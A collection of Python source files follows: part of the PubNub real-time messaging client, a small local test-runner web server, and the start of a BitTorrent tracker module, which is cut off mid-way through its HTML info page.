'subscribed': True, 'callback': callback, 'connect': connect, 'disconnect': disconnect, 'reconnect': reconnect, 'error': error, 'presence': presence } if state is not None: if channel in self.STATE: self.STATE[channel] = state[channel] else: self.STATE[channel] = state if channel_groups is not None: channel_groups = channel_groups if isinstance( channel_groups, list) else channel_groups.split(",") for channel_group in channel_groups: ## New Channel? if len(channel_group) > 0 and \ (not channel_group in self.subscription_groups or self.subscription_groups[channel_group]['subscribed'] is False): with self._channel_group_list_lock: self.subscription_groups[channel_group] = { 'name': channel_group, 'first': False, 'connected': False, 'disconnected': True, 'subscribed': True, 'callback': callback, 'connect': connect, 'disconnect': disconnect, 'reconnect': reconnect, 'error': error, 'presence': presence } ''' ## return if already connected to channel if channel in self.subscriptions and \ 'connected' in self.subscriptions[channel] and \ self.subscriptions[channel]['connected'] is True: _invoke(error, "Already Connected") return ''' ## SUBSCRIPTION RECURSION def _connect(): self._reset_offline() def error_callback(response): ## ERROR ? if not response or \ ('message' in response and response['message'] == 'Forbidden'): _invoke_error(channel_list=response['payload'][ 'channels'], error=response['message']) self.timeout(1, _connect) return if 'message' in response: _invoke_error(error=response['message']) else: _invoke_disconnect() self.timetoken = 0 self.timeout(1, _connect) def sub_callback(response): ## ERROR ? if not response or \ ('message' in response and response['message'] == 'Forbidden'): _invoke_error(channel_list=response['payload'][ 'channels'], error=response['message']) _connect() return _invoke_connect() with self._tt_lock: self.timetoken = \ self.last_timetoken if self.timetoken == 0 and \ self.last_timetoken != 0 else response[1] if len(response) > 3: channel_list = response[2].split(',') channel_list_2 = response[3].split(',') response_list = response[0] for ch in enumerate(channel_list): if ch[1] in self.subscription_groups or ch[1] in self.subscriptions: try: chobj = self.subscription_groups[ch[1]] except KeyError: chobj = self.subscriptions[ch[1]] if ('-pnpres' in channel_list_2[ch[0]]): cb = chobj['presence'] else: cb = chobj['callback'] _invoke(cb, self.decrypt(response_list[ch[0]]), chobj['name'].split('-pnpres')[0], channel_list_2[ch[0]].split('-pnpres')[0]) elif len(response) > 2: channel_list = response[2].split(',') response_list = response[0] for ch in enumerate(channel_list): if ch[1] in self.subscriptions: chobj = self.subscriptions[ch[1]] _invoke(chobj['callback'], self.decrypt(response_list[ch[0]]), chobj['name'].split('-pnpres')[0]) else: response_list = response[0] chobj = _get_channel() for r in response_list: if chobj: _invoke(chobj['callback'], self.decrypt(r), chobj['name'].split('-pnpres')[0]) _connect() channel_list = self.get_channel_list(self.subscriptions) channel_group_list = self.get_channel_group_list(self.subscription_groups) if len(channel_list) <= 0 and len(channel_group_list) <= 0: return if len(channel_list) <= 0: channel_list = ',' data = {"uuid": self.uuid, "auth": self.auth_key, 'pnsdk' : self.pnsdk, 'channel-group' : channel_group_list} st = json.dumps(self.STATE) if len(st) > 2: data['state'] = quote(st,safe="") ## CONNECT TO PUBNUB SUBSCRIBE SERVERS #try: self.SUB_RECEIVER = self._request({"urlcomponents": [ 'subscribe', self.subscribe_key, channel_list, '0', str(self.timetoken) ], "urlparams": data}, sub_callback, error_callback, single=True, timeout=320) ''' except Exception as e: print(e) self.timeout(1, _connect) return ''' self._connect = _connect ## BEGIN SUBSCRIPTION (LISTEN FOR MESSAGES) _connect() def _reset_offline(self): if self.SUB_RECEIVER is not None: self.SUB_RECEIVER() self.SUB_RECEIVER = None def CONNECT(self): self._reset_offline() self._connect() def unsubscribe(self, channel): """Unsubscribe from channel . Only works in async mode Args: channel: Channel name ( string ) """ if channel in self.subscriptions is False: return False ## DISCONNECT with self._channel_list_lock: if channel in self.subscriptions: self.subscriptions[channel]['connected'] = 0 self.subscriptions[channel]['subscribed'] = False self.subscriptions[channel]['timetoken'] = 0 self.subscriptions[channel]['first'] = False self.leave_channel(channel=channel) # remove channel from STATE self.STATE.pop(channel, None) self.CONNECT() def unsubscribe_group(self, channel_group): """Unsubscribe from channel group. Only works in async mode Args: channel_group: Channel group name ( string ) """ if channel_group in self.subscription_groups is False: return False ## DISCONNECT with self._channel_group_list_lock: if channel_group in self.subscription_groups: self.subscription_groups[channel_group]['connected'] = 0 self.subscription_groups[channel_group]['subscribed'] = False self.subscription_groups[channel_group]['timetoken'] = 0 self.subscription_groups[channel_group]['first'] = False self.leave_group(channel_group=channel_group) self.CONNECT() class PubnubCore(PubnubCoreAsync): def __init__( self, publish_key, subscribe_key, secret_key=None, cipher_key=None, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com', uuid=None, _tt_lock=None, _channel_list_lock=None, _channel_group_list_lock=None ): super(PubnubCore, self).__init__( publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, uuid=uuid, _tt_lock=_tt_lock, _channel_list_lock=_channel_list_lock, _channel_group_list_lock=_channel_group_list_lock ) self.subscriptions = {} self.timetoken = 0 self.accept_encoding = 'gzip' class HTTPClient: def __init__(self, pubnub, url, urllib_func=None, callback=None, error=None, id=None, timeout=5): self.url = url self.id = id self.callback = callback self.error = error self.stop = False self._urllib_func = urllib_func self.timeout = timeout self.pubnub = pubnub def cancel(self): self.stop = True self.callback = None self.error = None def run(self): def _invoke(func, data): if func is not None: func(get_data_for_user(data)) if self._urllib_func is None: return resp = self._urllib_func(self.url, timeout=self.timeout) data = resp[0] code = resp[1] if self.stop is True: return if self.callback is None: with self.pubnub.latest_sub_callback_lock: if self.pubnub.latest_sub_callback['id'] != self.id: return else: if self.pubnub.latest_sub_callback['callback'] is not None: self.pubnub.latest_sub_callback['id'] = 0 try: data = json.loads(data) except ValueError: _invoke(self.pubnub.latest_sub_callback['error'], {'error': 'json decoding error'}) return if code != 200: _invoke(self.pubnub.latest_sub_callback['error'], data) else: _invoke(self.pubnub.latest_sub_callback['callback'], data) else: try: data = json.loads(data) except ValueError: _invoke(self.error, {'error': 'json decoding error'}) return if code != 200: _invoke(self.error, data) else: _invoke(self.callback, data) def _urllib_request_2(url, timeout=5): try: resp = urllib2.urlopen(url, timeout=timeout) except urllib2.HTTPError as http_error: resp = http_error except urllib2.URLError as error: msg = {"message": str(error.reason)} return (json.dumps(msg), 0) return (resp.read(), resp.code) class PubnubHTTPAdapter(HTTPAdapter): def init_poolmanager(self, *args, **kwargs): kwargs.setdefault('socket_options', default_socket_options) super(PubnubHTTPAdapter, self).init_poolmanager(*args, **kwargs) s = requests.Session() #s.mount('http://', PubnubHTTPAdapter(max_retries=1)) #s.mount('https://', PubnubHTTPAdapter(max_retries=1)) #s.mount('http://pubsub.pubnub.com', HTTPAdapter(max_retries=1)) #s.mount('https://pubsub.pubnub.com', HTTPAdapter(max_retries=1)) def _requests_request(url, timeout=5): #print url try: resp = s.get(url, timeout=timeout) except requests.exceptions.HTTPError as http_error: resp = http_error except requests.exceptions.ConnectionError as error: msg = str(error) return (json.dumps(msg), 0) except requests.exceptions.Timeout as error: msg = str(error) return (json.dumps(msg), 0) #print (resp.text) #print (resp.status_code) return (resp.text, resp.status_code) def _urllib_request_3(url, timeout=5): try: resp = urllib.request.urlopen(url, timeout=timeout) except (urllib.request.HTTPError, urllib.request.URLError) as http_error: resp = http_error r = resp.read().decode("utf-8") return (r, resp.code) _urllib_request = None # Pubnub class Pubnub(PubnubCore): def __init__( self, publish_key, subscribe_key, secret_key=None, cipher_key=None, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com', uuid=None, pooling=True, daemon=False, pres_uuid=None, azure=False ): super(Pubnub, self).__init__( publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, uuid=uuid or pres_uuid, _tt_lock=threading.RLock(), _channel_list_lock=threading.RLock(), _channel_group_list_lock=threading.RLock() ) global _urllib_request if self.python_version == 2: _urllib_request = _urllib_request_2 else: _urllib_request = _urllib_request_3 if pooling is True: _urllib_request = _requests_request self.latest_sub_callback_lock = threading.RLock() self.latest_sub_callback = {'id': None, 'callback': None} self.pnsdk = 'PubNub-Python' + '/' + self.version self.daemon = daemon if azure is False: s.mount('http://pubsub.pubnub.com', HTTPAdapter(max_retries=1)) s.mount('https://pubsub.pubnub.com', HTTPAdapter(max_retries=1)) else: s.mount('http://', PubnubHTTPAdapter(max_retries=1)) s.mount('https://', PubnubHTTPAdapter(max_retries=1)) def timeout(self, interval, func): def cb(): time.sleep(interval) func() thread = threading.Thread(target=cb) thread.daemon = self.daemon thread.start() def _request_async(self, request, callback=None, error=None, single=False, timeout=5): global _urllib_request ## Build URL url = self.getUrl(request) if single is True: id = time.time() client = HTTPClient(self, url=url, urllib_func=_urllib_request, callback=None, error=None, id=id, timeout=timeout) with self.latest_sub_callback_lock: self.latest_sub_callback['id'] = id self.latest_sub_callback['callback'] = callback self.latest_sub_callback['error'] = error else: client = HTTPClient(self, url=url, urllib_func=_urllib_request, callback=callback, error=error, timeout=timeout) thread = threading.Thread(target=client.run) thread.daemon = self.daemon thread.start() def abort(): client.cancel() return abort def _request_sync(self, request, timeout=5): global _urllib_request ## Build URL url = self.getUrl(request) ## Send Request Expecting JSONP Response response = _urllib_request(url, timeout=timeout) try: resp_json = json.loads(response[0]) except ValueError: return [0, "JSON Error"] if response[1] != 200 and 'message' in resp_json and 'payload' in resp_json: return {'message': resp_json['message'], 'payload': resp_json['payload']} if response[1] == 0: return [0, resp_json] return resp_json def _request(self, request, callback=None, error=None, single=False, timeout=5): if callback is None: return get_data_for_user(self._request_sync(request, timeout=timeout)) else: return self._request_async(request, callback, error, single=single, timeout=timeout) # Pubnub Twisted class PubnubTwisted(PubnubCoreAsync): def start(self): reactor.run() def stop(self): reactor.stop() def timeout(self, delay, callback): reactor.callLater(delay, callback) def __init__( self, publish_key, subscribe_key, secret_key=None, cipher_key=None, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com' ): super(PubnubTwisted, self).__init__( publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, ) self.headers = {} self.headers['User-Agent'] = ['Python-Twisted'] self.headers['V'] = [self.version] self.pnsdk = 'PubNub-Python-' + 'Twisted' + '/' + self.version def _request(self, request, callback=None, error=None, single=False, timeout=5): global pnconn_pool def _invoke(func, data): if func is not None: func(get_data_for_user(data)) ## Build URL url = self.getUrl(request) agent = ContentDecoderAgent(RedirectAgent(Agent( reactor, contextFactory=WebClientContextFactory(), pool=self.ssl and None or pnconn_pool )), [('gzip', GzipDecoder)]) try: request = agent.request( 'GET', url, Headers(self.headers), None) except TypeError: request = agent.request( 'GET', url.encode(), Headers(self.headers), None) if single is True: id = time.time() self.id = id def received(response): if not isinstance(response, twisted.web._newclient.Response): _invoke(error, {"message": "Not Found"}) return finished = Deferred() if response.code in [401, 403]: response.deliverBody(PubNubPamResponse(finished)) else: response.deliverBody(PubNubResponse(finished)) return finished def complete(data): if single is True: if id != self.id: return None try: data = json.loads(data) except ValueError: try: data = json.loads(data.decode("utf-8")) except ValueError: _invoke(error, {'error': 'json decode error'}) if 'error' in data and 'status' in data and 'status' != 200: _invoke(error, data) else: _invoke(callback, data) def abort(): pass request.addCallback(received) request.addCallback(complete) return abort # PubnubTornado class PubnubTornado(PubnubCoreAsync): def stop(self): ioloop.stop() def start(self): ioloop.start() def timeout(self, delay, callback): ioloop.add_timeout(time.time() + float(delay), callback) def __init__( self, publish_key, subscribe_key, secret_key=False, cipher_key=False, auth_key=False, ssl_on=False, origin='pubsub.pubnub.com' ): super(PubnubTornado, self).__init__( publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, ) self.headers = {} self.headers['User-Agent'] = 'Python-Tornado' self.headers['Accept-Encoding'] = self.accept_encoding self.headers['V'] = self.version self.http = tornado.httpclient.AsyncHTTPClient(max_clients=1000) self.id = None self.pnsdk = 'PubNub-Python-' + 'Tornado' + '/' + self.version def _request(self, request, callback=None, error=None, single=False, timeout=5, connect_timeout=5): def _invoke(func, data): if func is not None: func(get_data_for_user(data)) url = self.getUrl(request) request = tornado.httpclient.HTTPRequest( url, 'GET', self.headers, connect_timeout=connect_timeout, request_timeout=timeout) if single is True: id = time.time() self.id = id def responseCallback(response): if single is True: if not id == self.id: return None body = response._get_body() if body is None: return def handle_exc(*args): return True if response.error is not None: with ExceptionStackContext(handle_exc): if response.code in [403, 401]: response.rethrow() else: _invoke(error, {"message": response.reason}) return try: data = json.loads(body) except TypeError: try: data = json.loads(body.decode("utf-8")) except ValueError: _invoke(error, {'error': 'json decode error'}) if 'error' in data and 'status' in data and 'status' != 200: _invoke(error, data) else: _invoke(callback, data) self.http.fetch( request=request, callback=responseCallback ) def abort(): pass return abort
webserver.py
import time import threading import traceback import json import nose import sys import linecache import inspect import os.path import queue as queue import urllib.parse from io import StringIO from http.server import HTTPServer, BaseHTTPRequestHandler import socketserver as socketserver from mpi4py import MPI from nose.plugins.capture import Capture from nose.plugins.skip import Skip, SkipTest from nose.core import TestProgram from multiprocessing import Process, Queue from optparse import OptionParser from subprocess import call, Popen, PIPE EDITOR = None osascript_to_open_xcode = """on run argv set linenumber to (item 1 of argv) as integer set filename_string to item 2 of argv set file_to_open to POSIX file filename_string tell application "Xcode" activate set doc_to_edit to (open file_to_open) tell doc_to_edit set its selection to item linenumber of paragraph of it end tell end tell end run""" def open_file(path, lineno = 1): global EDITOR if sys.platform == 'darwin': program = Popen( ['osascript', '-', str(lineno), os.path.join(os.getcwd(), path) ], stdin = PIPE, stdout = PIPE, stderr = PIPE) out, err = program.communicate(osascript_to_open_xcode) else: possible_programs = ( ['geany', path, '+'+str(lineno)], ['kate', '-u', '--line',str(lineno),path], ['emacs', '+'+str(lineno), path], ['nedit-client','-line', str(lineno), path], ) for program in possible_programs: if program[0] == EDITOR: returncode = call(['which', program[0]]) if returncode == 0: call(program) return for program in possible_programs: returncode = call(['which', program[0]]) if returncode == 0: call(program) return call([EDITOR, path]) class HandleRequest(BaseHTTPRequestHandler): def do_GET(self): self.parsed_path = urllib.parse.urlparse(self.path) path = self.parsed_path.path[1:] method_name = 'do_' + path if hasattr(self, method_name): method = getattr(self,method_name) string, content_type = method() else: if path.endswith(".js"): string, content_type = self.javascript_file(path) else: string, content_type = self.index_file() self.send_response(200) self.send_header("Content-type", content_type) self.send_header("Content-Length", str(len(string))) self.end_headers() self.wfile.write(string) def do_long_poll(self): self.send_response(200) self.send_header("Content-Type", "text/javascript") self.send_header("Transfer-Encoding", "chunked") self.send_header("Cache-Control", "no-cache, no-store") self.send_header("Pragma", "no-cache") self.end_headers() while True: self.server.tests_finished.wait(10.0) if self.server.tests_finished.is_set(): self.send_chunk('true') self.server.tests_finished.clear() else: self.send_chunk('false') self.wfile.write('0\r\n\r\n') self.wfile.flush() def send_chunk(self, string): hex_length = hex(len(string))[2:] self.wfile.write('%s \r\n' % hex_length) self.wfile.flush() self.wfile.write(string) self.wfile.write('\r\n') self.wfile.flush() def index_file(self): base = os.path.split(__file__)[0] filename = os.path.join(base, "realtime_test.html") with open(filename, "r") as file: contents = file.read() return contents, 'text/html' def javascript_file(self, path): base = os.path.split(__file__)[0] filename = os.path.join(base, path) if not os.path.exists(path): return '', 'text/javascript' with open(filename, "r") as file: contents = file.read() return contents, 'text/javascript' def log_message(self, format, *args): pass #sys.stderr.write("%s - - [%s] %s\n" % # (self.address_string(), # self.log_date_time_string(), # format%args)) def do_stop(self): thread = threading.Thread(target=self.server.stop) thread.daemon = True; thread.start() return 'null', 'text/javascript' def do_events(self): new_events = self.server.get_all_events_since_previous_query() string = json.dumps(new_events) content_type = 'text/javascript' return string, content_type def do_open_file(self): parameters = urllib.parse.parse_qs(self.parsed_path.query) path = parameters['path'][0] lineno = int(parameters['lineno'][0]) open_file(path, lineno) string = 'null' content_type = 'text/javascript' return string, content_type class WebServer(socketserver.ThreadingMixIn, HTTPServer): def __init__(self, port, request_handler): HTTPServer.__init__(self, ('', port), request_handler) self.daemon_threads = True self.events_queue = queue.Queue() def start(self): self.serve_forever() def stop(self): self.shutdown() def get_all_events_since_previous_query(self): try: events = [] while True: events.append(self.events_queue.get(False)) except queue.Empty: pass return events
track.py
# Written by Bram Cohen # see LICENSE.txt for license information from OCSBttrack.parseargs import parseargs, formatDefinitions from OCSBttrack.RawServer import RawServer, autodetect_ipv6, autodetect_socket_style from OCSBttrack.HTTPHandler import HTTPHandler, months, weekdays from OCSBttrack.parsedir import parsedir from NatCheck import NatCheck, CHECK_PEER_ID_ENCRYPTED from OCSBttrack.BTcrypto import CRYPTO_OK from T2T import T2TList from OCSBttrack.subnetparse import IP_List, ipv6_to_ipv4, to_ipv4, is_valid_ip, is_ipv4 from OCSBttrack.iprangeparse import IP_List as IP_Range_List from OCSBttrack.torrentlistparse import parsetorrentlist from threading import Event, Thread from OCSBttrack.bencode import bencode, bdecode, Bencached from OCSBttrack.zurllib import urlopen, quote, unquote from Filter import Filter from urlparse import urlparse from os import rename, getpid from os.path import exists, isfile from cStringIO import StringIO from traceback import print_exc from time import time, gmtime, strftime, localtime from OCSBttrack.clock import clock from random import shuffle, seed, randrange from types import StringType, IntType, LongType, ListType, DictType from binascii import b2a_hex, a2b_hex, a2b_base64 from string import lower import sys, os import signal import re import OCSBttrack.__init__ from OCSBttrack.__init__ import version, createPeerID try: True except: True = 1 False = 0 bool = lambda x: not not x defaults = [ ('tracker_timeout', 0, "Time to stop tracker"), ('tracker_max_completed', 0, "Stop tracker via count of transfer completed"), ('port', 80, "Port to listen on."), ('dfile', None, 'file to store recent downloader info in'), ('bind', '', 'comma-separated list of ips/hostnames to bind to locally'), # ('ipv6_enabled', autodetect_ipv6(), ('ipv6_enabled', 0, 'allow the client to connect to peers via IPv6'), ('ipv6_binds_v4', autodetect_socket_style(), 'set if an IPv6 server socket will also field IPv4 connections'), ('socket_timeout', 15, 'timeout for closing connections'), ('save_dfile_interval', 5 * 60, 'seconds between saving dfile'), ('timeout_downloaders_interval', 45 * 60, 'seconds between expiring downloaders'), ('reannounce_interval', 30 * 60, 'seconds downloaders should wait between reannouncements'), ('response_size', 50, 'number of peers to send in an info message'), ('timeout_check_interval', 5, 'time to wait between checking if any connections have timed out'), ('nat_check', 3, "how many times to check if a downloader is behind a NAT (0 = don't check)"), ('log_nat_checks', 0, "whether to add entries to the log for nat-check results"), ('min_time_between_log_flushes', 3.0, 'minimum time it must have been since the last flush to do another one'), ('min_time_between_cache_refreshes', 600.0, 'minimum time in seconds before a cache is considered stale and is flushed'), ('allowed_dir', '', 'only allow downloads for .torrents in this dir'), ('allowed_list', '', 'only allow downloads for hashes in this list (hex format, one per line)'), ('allowed_controls', 0, 'allow special keys in torrents in the allowed_dir to affect tracker access'), ('multitracker_enabled', 0, 'whether to enable multitracker operation'), ('multitracker_allowed', 'autodetect', 'whether to allow incoming tracker announces (can be none, autodetect or all)'), ('multitracker_reannounce_interval', 2 * 60, 'seconds between outgoing tracker announces'), ('multitracker_maxpeers', 20, 'number of peers to get in a tracker announce'), ('aggregate_forward', '', 'format: <url>[,<password>] - if set, forwards all non-multitracker to this url with this optional password'), ('aggregator', '0', 'whether to act as a data aggregator rather than a tracker. If enabled, may be 1, or <password>; ' + 'if password is set, then an incoming password is required for access'), ('hupmonitor', 0, 'whether to reopen the log file upon receipt of HUP signal'), ('http_timeout', 60, 'number of seconds to wait before assuming that an http connection has timed out'), ('parse_dir_interval', 60, 'seconds between reloading of allowed_dir or allowed_file ' + 'and allowed_ips and banned_ips lists'), ('show_infopage', 1, "whether to display an info page when the tracker's root dir is loaded"), ('infopage_redirect', '', 'a URL to redirect the info page to'), ('show_names', 1, 'whether to display names from allowed dir'), ('favicon', '', 'file containing x-icon data to return when browser requests favicon.ico'), ('allowed_ips', '', 'only allow connections from IPs specified in the given file; '+ 'file contains subnet data in the format: aa.bb.cc.dd/len'), ('banned_ips', '', "don't allow connections from IPs specified in the given file; "+ 'file contains IP range data in the format: xxx:xxx:ip1-ip2'), ('only_local_override_ip', 2, "ignore the ip GET parameter from machines which aren't on local network IPs " + "(0 = never, 1 = always, 2 = ignore if NAT checking is not enabled)"), ('logfile', '', 'file to write the tracker logs, use - for stdout (default)'), ('allow_get', 0, 'use with allowed_dir; adds a /file?hash={hash} url that allows users to download the torrent file'), ('keep_dead', 0, 'keep dead torrents after they expire (so they still show up on your /scrape and web page)'), ('scrape_allowed', 'full', 'scrape access allowed (can be none, specific or full)'), ('dedicated_seed_id', '', 'allows tracker to monitor dedicated seed(s) and flag torrents as seeded'), ('compact_reqd', 1, "only allow peers that accept a compact response"), ] def statefiletemplate(x): if type(x) != DictType: raise ValueError for cname, cinfo in x.items(): if cname == 'peers': for y in cinfo.values(): # The 'peers' key is a dictionary of SHA hashes (torrent ids) if type(y) != DictType: # ... for the active torrents, and each is a dictionary raise ValueError for id, info in y.items(): # ... of client ids interested in that torrent if (len(id) != 20): raise ValueError if type(info) != DictType: # ... each of which is also a dictionary raise ValueError # ... which has an IP, a Port, and a Bytes Left count for that client for that torrent if type(info.get('ip', '')) != StringType: raise ValueError port = info.get('port') if type(port) not in (IntType,LongType) or port < 0: raise ValueError left = info.get('left') if type(left) not in (IntType,LongType) or left < 0: raise ValueError if type(info.get('supportcrypto')) not in (IntType,LongType): raise ValueError if type(info.get('requirecrypto')) not in (IntType,LongType): raise ValueError elif cname == 'completed': if (type(cinfo) != DictType): # The 'completed' key is a dictionary of SHA hashes (torrent ids) raise ValueError # ... for keeping track of the total completions per torrent for y in cinfo.values(): # ... each torrent has an integer value if type(y) not in (IntType,LongType): raise ValueError # ... for the number of reported completions for that torrent elif cname == 'allowed': if (type(cinfo) != DictType): # a list of info_hashes and included data raise ValueError if x.has_key('allowed_dir_files'): adlist = [z[1] for z in x['allowed_dir_files'].values()] for y in cinfo.keys(): # and each should have a corresponding key here if not y in adlist: raise ValueError elif cname == 'allowed_dir_files': if (type(cinfo) != DictType): # a list of files, their attributes and info hashes raise ValueError dirkeys = {} for y in cinfo.values(): # each entry should have a corresponding info_hash if not y[1]: continue if not x['allowed'].has_key(y[1]): raise ValueError if dirkeys.has_key(y[1]): # and each should have a unique info_hash raise ValueError dirkeys[y[1]] = 1 alas = 'your file may exist elsewhere in the universe\nbut alas, not here\n' local_IPs = IP_List() local_IPs.set_intranet_addresses() def isotime(secs = None): if secs == None: secs = time() return strftime('%Y-%m-%d %H:%M UTC', gmtime(secs)) http_via_filter = re.compile(' for ([0-9.]+)\Z') def _get_forwarded_ip(headers): header = headers.get('x-forwarded-for') if header: try: x,y = header.split(',') except: return header if is_valid_ip(x) and not local_IPs.includes(x): return x return y header = headers.get('client-ip') if header: return header header = headers.get('via') if header: x = http_via_filter.search(header) try: return x.group(1) except: pass header = headers.get('from') #if header: # return header #return None return header def get_forwarded_ip(headers): x = _get_forwarded_ip(headers) if x is None or not is_valid_ip(x) or local_IPs.includes(x): return None return x def compact_peer_info(ip, port): try: s = ( ''.join([chr(int(i)) for i in ip.split('.')]) + chr((port & 0xFF00) >> 8) + chr(port & 0xFF) ) if len(s) != 6: raise ValueError except: s = '' # not a valid IP, must be a domain name return s class Tracker: def __init__(self, config, rawserver): self.completedno = 0 self.config = config self.response_size = config['response_size'] self.dfile = config['dfile'] self.natcheck = config['nat_check'] favicon = config['favicon'] self.parse_dir_interval = config['parse_dir_interval'] self.favicon = None if favicon: try: h = open(favicon,'r') self.favicon = h.read() h.close() except: print "**warning** specified favicon file -- %s -- does not exist." % favicon self.rawserver = rawserver self.cached = {} # format: infohash: [[time1, l1, s1], [time2, l2, s2], ...] self.cached_t = {} # format: infohash: [time, cache] self.times = {} self.state = {} self.seedcount = {} self.tracker_inittime = time() self.tracker_timeout = config['tracker_timeout'] self.tracker_max_completed = config['tracker_max_completed'] self.allowed_IPs = None self.banned_IPs = None if config['allowed_ips'] or config['banned_ips']: self.allowed_ip_mtime = 0 self.banned_ip_mtime = 0 self.read_ip_lists() self.only_local_override_ip = config['only_local_override_ip'] if self.only_local_override_ip == 2: self.only_local_override_ip = not config['nat_check'] if CHECK_PEER_ID_ENCRYPTED and not CRYPTO_OK: print ('**warning** crypto library not installed,' + ' cannot completely verify encrypted peers') if exists(self.dfile): try: h = open(self.dfile, 'rb') ds = h.read() h.close() tempstate = bdecode(ds) if not tempstate.has_key('peers'): tempstate = {'peers': tempstate} statefiletemplate(tempstate) self.state = tempstate except: print '**warning** statefile '+self.dfile+' corrupt; resetting' self.downloads = self.state.setdefault('peers', {}) self.completed = self.state.setdefault('completed', {}) self.becache = {} ''' format: infohash: [[l0, s0], [l1, s1], ...] l0,s0 = compact, not requirecrypto=1 l1,s1 = compact, only supportcrypto=1 l2,s2 = [compact, crypto_flag], all peers if --compact_reqd 0: l3,s3 = [ip,port,id] l4,l4 = [ip,port] nopeerid ''' if config['compact_reqd']: self.cache_default_len = 3 else: self.cache_default_len = 5 for infohash, ds in self.downloads.items(): self.seedcount[infohash] = 0 for x,y in ds.items(): ip = y['ip'] if ( (self.allowed_IPs and not self.allowed_IPs.includes(ip)) or (self.banned_IPs and self.banned_IPs.includes(ip)) ): del ds[x] continue if not y['left']: self.seedcount[infohash] += 1 if y.get('nat',-1): continue gip = y.get('given_ip') if is_valid_ip(gip) and ( not self.only_local_override_ip or local_IPs.includes(ip) ): ip = gip self.natcheckOK(infohash,x,ip,y['port'],y) for x in self.downloads.keys(): self.times[x] = {} for y in self.downloads[x].keys(): self.times[x][y] = 0 self.trackerid = createPeerID('-T-') seed(self.trackerid) self.reannounce_interval = config['reannounce_interval'] self.save_dfile_interval = config['save_dfile_interval'] self.show_names = config['show_names'] rawserver.add_task(self.save_state, self.save_dfile_interval) rawserver.add_task(self.test_state_and_finish, 1) self.prevtime = clock() self.timeout_downloaders_interval = config['timeout_downloaders_interval'] rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval) self.logfile = None self.log = None if (config['logfile']) and (config['logfile'] != '-'): try: self.logfile = config['logfile'] self.log = open(self.logfile,'a') sys.stdout = self.log print "# Log Started: ", isotime() except: print "**warning** could not redirect stdout to log file: ", sys.exc_info()[0] if config['hupmonitor']: def huphandler(signum, frame, self = self): try: self.log.close () self.log = open(self.logfile,'a') sys.stdout = self.log print "# Log reopened: ", isotime() except: print "**warning** could not reopen logfile" signal.signal(signal.SIGHUP, huphandler) self.allow_get = config['allow_get'] self.t2tlist = T2TList(config['multitracker_enabled'], self.trackerid, config['multitracker_reannounce_interval'], config['multitracker_maxpeers'], config['http_timeout'], self.rawserver) if config['allowed_list']: if config['allowed_dir']: print '**warning** allowed_dir and allowed_list options cannot be used together' print '**warning** disregarding allowed_dir' config['allowed_dir'] = '' self.allowed = self.state.setdefault('allowed_list',{}) self.allowed_list_mtime = 0 self.parse_allowed() self.remove_from_state('allowed','allowed_dir_files') if config['multitracker_allowed'] == 'autodetect': config['multitracker_allowed'] = 'none' config['allowed_controls'] = 0 elif config['allowed_dir']: self.allowed = self.state.setdefault('allowed',{}) self.allowed_dir_files = self.state.setdefault('allowed_dir_files',{}) self.allowed_dir_blocked = {} self.parse_allowed() self.remove_from_state('allowed_list') else: self.allowed = None self.remove_from_state('allowed','allowed_dir_files', 'allowed_list') if config['multitracker_allowed'] == 'autodetect': config['multitracker_allowed'] = 'none' config['allowed_controls'] = 0 self.uq_broken = unquote('+') != ' ' self.keep_dead = config['keep_dead'] self.Filter = Filter(rawserver.add_task) aggregator = config['aggregator'] if aggregator == '0': self.is_aggregator = False self.aggregator_key = None else: self.is_aggregator = True if aggregator == '1': self.aggregator_key = None else: self.aggregator_key = aggregator self.natcheck = False send = config['aggregate_forward'] if not send: self.aggregate_forward = None else: try: self.aggregate_forward, self.aggregate_password = send.split(',') except: self.aggregate_forward = send self.aggregate_password = None self.dedicated_seed_id = config['dedicated_seed_id'] self.is_seeded = {} self.cachetime = 0 self.cachetimeupdate() def cachetimeupdate(self): self.cachetime += 1 # raw clock, but more efficient for cache self.rawserver.add_task(self.cachetimeupdate,1) def aggregate_senddata(self, query): url = self.aggregate_forward+'?'+query if self.aggregate_password is not None: url += '&password='+self.aggregate_password rq = Thread(target = self._aggregate_senddata, args = [url]) rq.setDaemon(False) rq.start() def _aggregate_senddata(self, url): # just send, don't attempt to error check, try: # discard any returned data h = urlopen(url) h.read() h.close() except: return def get_infopage(self): try: if not self.config['show_infopage']: return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas) red = self.config['infopage_redirect'] if red: return (302, 'Found', {'Content-Type': 'text/html', 'Location': red}, '<A HREF="'+red+'">Click Here</A>') s = StringIO() s.write('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">\n' \ '<html><head><title>BitTorrent download info</title>\n') if self.favicon is not None: s.write('<link rel="shortcut icon" href="/favicon.ico">\n') s.write('</head>\n<body>\n' \ '<h3>BitTorrent download info</h3>\n'\ '<ul>\n' '<li><strong>tracker version:</strong> %s</li>\n' \ '<li><strong>server time:</strong> %s</li>\n' \ '</ul>\n' % (version, isotime())) if self.config['allowed_dir']: if self.show_names: names = [ (self.allowed[hash]['name'],hash) for hash in self.allowed.keys() ] else: names = [ (None,hash) for hash in self.allowed.keys() ] else: names = [ (None,hash) for hash in self.downloads.keys() ] if not names: s.write('<p>not tracking any files yet...</p>\n') else: names.sort() tn = 0 tc = 0 td = 0 tt = 0 # Total transferred ts = 0 # Total size nf = 0 # Number of files displayed if self.config['allowed_dir'] and self.show_names: s.write('<table summary="files" border="1">\n' \ '<tr><th>info hash</th><th>torrent name</th><th align="right">size</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th><th align="right">transferred</th></tr>\n') else: s.write('<table summary="files">\n' \ '<tr><th>info hash</th><th 